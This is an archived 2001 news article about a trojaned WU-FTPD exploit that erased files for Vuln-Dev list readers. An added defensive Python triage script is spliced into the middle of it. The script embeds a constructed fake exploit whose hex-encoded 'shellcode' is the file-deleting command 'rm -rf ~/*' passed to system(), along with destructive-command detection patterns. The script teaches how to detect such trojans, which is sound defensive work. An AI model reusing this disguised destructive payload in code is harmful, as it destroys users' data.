http://www.newsbytes.com/news/01/170392.html

'Happy Hacker' Drops A Bomb On Security Experts
By Brian McWilliams, Newsbytes
CEDAR CREST, NEW MEXICO, U.S.A., 21 Sep 2001, 3:34 PM CST

They operate in a shadowy online world where people often conceal their true identities behind nicknames like Blue Boar, ObLiviON, and w1re p4ir. But sometimes even computer security experts get a brutal reminder: you can't always trust what you read on e-mail lists. And you certainly shouldn't put any faith in programs posted there.

On Wednesday, the 5,000-strong subscribers to a popular security list known as Vuln-Dev received what may have looked like a rare treat: a message to the list containing source code to a program said to give the user full control of a remote Unix system.

The message, apparently from Carolyn Meinel, a computer security consultant and author of a book called "The Happy Hacker," claimed the code exploited a vulnerability in the latest version of WU-FTPD, a file transfer program used by many sites around the world. A copy of the code, wu261.c, was also available at Meinel's site, techbroker.com.

But as some Vuln-Dev readers, many of whom are system administrators for businesses, painfully learned, the program was a Trojan horse, and if compiled and run, could delete most of the files on the user's computer.

List member Jason Parker told Newsbytes he glanced over the code before compiling it, decided it looked legitimate, and ran it Thursday on the test account of a system.

"I lost everything in the home directory, including information I would rather not have lost, but that's the price you pay for trusting," said Parker, who has since replaced the front page of his site with an obscene comment about Meinel.

But Meinel claims that she did not write the message containing the "exploit." Instead, she believes it was skillfully composed and mailed out by someone who hacked her site and had the ability to create files and send e-mail using her account.
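The lesson of Parker's experience is that a glance at exploit source is not a review: the C code can read like a plausible remote exploit while the destructive payload sits in a byte string labelled "shellcode". The following triage script is an added example, not code from the article and not the wu261.c file it describes (the page does not reproduce that file). It decodes every string literal the way the compiler would, concatenating adjacent literals, and looks for shell-command text and file-destroying libc calls. Both C source samples embedded in it are constructed for this illustration; the destructive-pattern list and the risky-call list are this example's own choices, not a standard.

```python
"""Static triage of an 'exploit' source file before anyone compiles it.

Added example (not from the article or from wu261.c). Decodes C string
literals as the compiler would, recovers any ASCII command text hidden in
them, and lists libc calls that run commands or destroy files. The two
C sources below are constructed samples, not real exploit code.
"""
import re

# Constructed trojan: looks like a WU-FTPD exploit, but the "shellcode"
# is the ASCII of a destructive command that main() hands to system().
TROJAN_SOURCE = r'''
/* wu-ftpd 2.6.1 remote root, "private" release */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =
    "\x72\x6d\x20\x2d\x72\x66\x20\x7e\x2f\x2a\x20\x32\x3e\x2f\x64\x65\x76"
    "\x2f\x6e\x75\x6c\x6c";

int main(int argc, char **argv) {
    char buf[1024];
    printf("[*] connecting to %s\n", argv[1]);
    memset(buf, 0x90, sizeof(buf));
    system(shellcode);      // "launches" the payload
    return 0;
}
'''

# Constructed benign sample: textbook execve("/bin/sh") shellcode, no
# destructive command text and no dangerous libc call in the C itself.
PLAIN_SOURCE = r'''
char shellcode[] = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1"
                   "\xb0\x0b\xcd\x80";
int main(void) { ((void (*)(void))shellcode)(); return 0; }
'''

# One scanner pass so comments are recognised without mangling literals
# (a bare comment regex would truncate the "//sh" inside a string).
TOKEN = re.compile(r'"(?:\\.|[^"\\\n])*"|\'(?:\\.|[^\'\\\n])*\'|/\*.*?\*/|//[^\n]*', re.S)
LITERAL = re.compile(r'"((?:\\.|[^"\\\n])*)"')
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")
DESTRUCTIVE = [re.compile(p) for p in (
    rb"\brm\s+-[a-zA-Z]*[rf]",      # rm -rf, rm -r, rm -f
    rb"\bdd\s+if=",                 # raw disk writes
    rb"\bmkfs", rb"\bshred\b", rb">\s*/dev/[hs]d", rb"\bchmod\s+-R",
)]
RISKY_CALLS = ("system", "popen", "execve", "execl", "execlp", "execv",
               "execvp", "unlink", "remove", "rmdir", "truncate")


def scrub(source, keep_literals=True):
    """Blank out comments and char literals (and, optionally, string
    literals) with spaces so later regexes only see real code."""
    def repl(m):
        tok = m.group(0)
        return tok if keep_literals and tok[0] == '"' else " "
    return TOKEN.sub(repl, source)


def decode_literals(source):
    """Byte contents of each C string literal, concatenating adjacent
    literals exactly as the compiler does."""
    code = scrub(source)
    chunks, current, prev_end = [], b"", None
    for m in LITERAL.finditer(code):
        raw = m.group(1)
        try:   # \xHH, \NNN and the usual C escapes each map to one byte
            data = raw.encode("latin-1", "replace").decode("unicode_escape").encode("latin-1", "replace")
        except UnicodeDecodeError:
            data = raw.encode("latin-1", "replace")
        if prev_end is not None and code[prev_end:m.start()].strip() == "":
            current += data          # adjacent literal: same string object
        else:
            if current:
                chunks.append(current)
            current = data
        prev_end = m.end()
    if current:
        chunks.append(current)
    return chunks


def triage(source):
    """Recovered printable string content, the subset that reads like a
    destructive shell command, and risky libc calls made in the code."""
    strings = [run.decode("ascii")
               for lit in decode_literals(source) for run in PRINTABLE_RUN.findall(lit)]
    commands = [s for s in strings if any(p.search(s.encode()) for p in DESTRUCTIVE)]
    code = scrub(source, keep_literals=False)
    calls = [name for name in RISKY_CALLS if re.search(rf"\b{name}\s*\(", code)]
    return {"strings": strings, "commands": commands, "calls": calls}


def is_suspicious(report):
    """Hidden command text, or a call that executes a command, is reason
    enough to read the file line by line before compiling it anywhere."""
    return bool(report["commands"]) or bool({"system", "popen"} & set(report["calls"]))


if __name__ == "__main__":
    for label, src in (("trojan", TROJAN_SOURCE), ("plain", PLAIN_SOURCE)):
        rep = triage(src)
        print(f"{label}: suspicious={is_suspicious(rep)} "
              f"commands={rep['commands']} calls={rep['calls']}")
```

On the constructed trojan the decoded "shellcode" comes back as the plain command `rm -rf ~/* 2>/dev/null` and the only risky call is `system`, which is exactly what a skim of the hex escapes would not show; the benign sample yields the familiar `//sh` and `/bin` fragments and nothing else. A clean report is not proof of safety (a payload can be XOR-encoded or built at runtime), so treat this as a first filter, and still compile and run unknown exploit code only in a throwaway virtual machine.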
"Whoever did it is pretty darn good. This is not the work of your average script kiddie," Meinel told Newsbytes.

A frequent target for attack by some security professionals who consider her a charlatan, Meinel suffered a similar site compromise in January. A group calling itself Girlies for Hacking defaced Meinel's site and posted the contents of her e-mail inbox on the Web.

Meinel said she's not embarrassed by the latest security breach and is mainly concerned about the potential harm done to systems managed by Vuln-Dev readers.

"This wasn't an attack on me. It was an attack on the Internet infrastructure," according to Meinel, who said she is working with a forensics expert to track down the perpetrators.

The incident has aggravated officials at SecurityFocus, the security information and consulting firm that hosts and moderates the Vuln-Dev list.

"Somebody went to a lot of effort to make us look like fools," said David Ahmad, threat analysis manager for SecurityFocus.

According to Ahmad, pranksters often submit exploits with hidden malicious payloads to the company's numerous security discussion lists. List moderators review the postings and weed out the trash, but accidents happen, as was the case recently when an obfuscated program made it through to the firm's prestigious Bugtraq list, which has nearly 40,000 readers. That code secretly launched a denial of service attack on a nameserver operated by Network Associates.

Ahmad said the attackers attempted to post the phony WU-FTPD exploit to Bugtraq Monday, but he became suspicious after skimming the code and blocked it from going through. But with moderators distracted by the Nimda worm, the attackers were able to slip the posting past Vuln-Dev's moderators a few days later, according to Ahmad.

SecurityFocus has deleted the phony Meinel posting from the Web archive for Vuln-Dev.
But while the code hasn't shown up yet in online libraries of hacking tools, its damage may not be done and there may be more hard lessons in store for curious hackers.

"A remote exploit for the latest version of a common service is like a prize. Anyone who sees it will be tempted to download and run it," said Ahmad.

Vuln-Dev is archived on the Web at http://www.securityfocus.com/templates/archive.pike?list=82 .

A mirror of the January defacement of Techbroker.com is at http://www.attrition.org/mirror/attrition/2001/01/13/www.techbroker.com

-
ISN is currently hosted by Attrition.org
To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail.
This archive was generated by hypermail 2b30 : Sat Sep 22 2001 - 04:37:34 PDT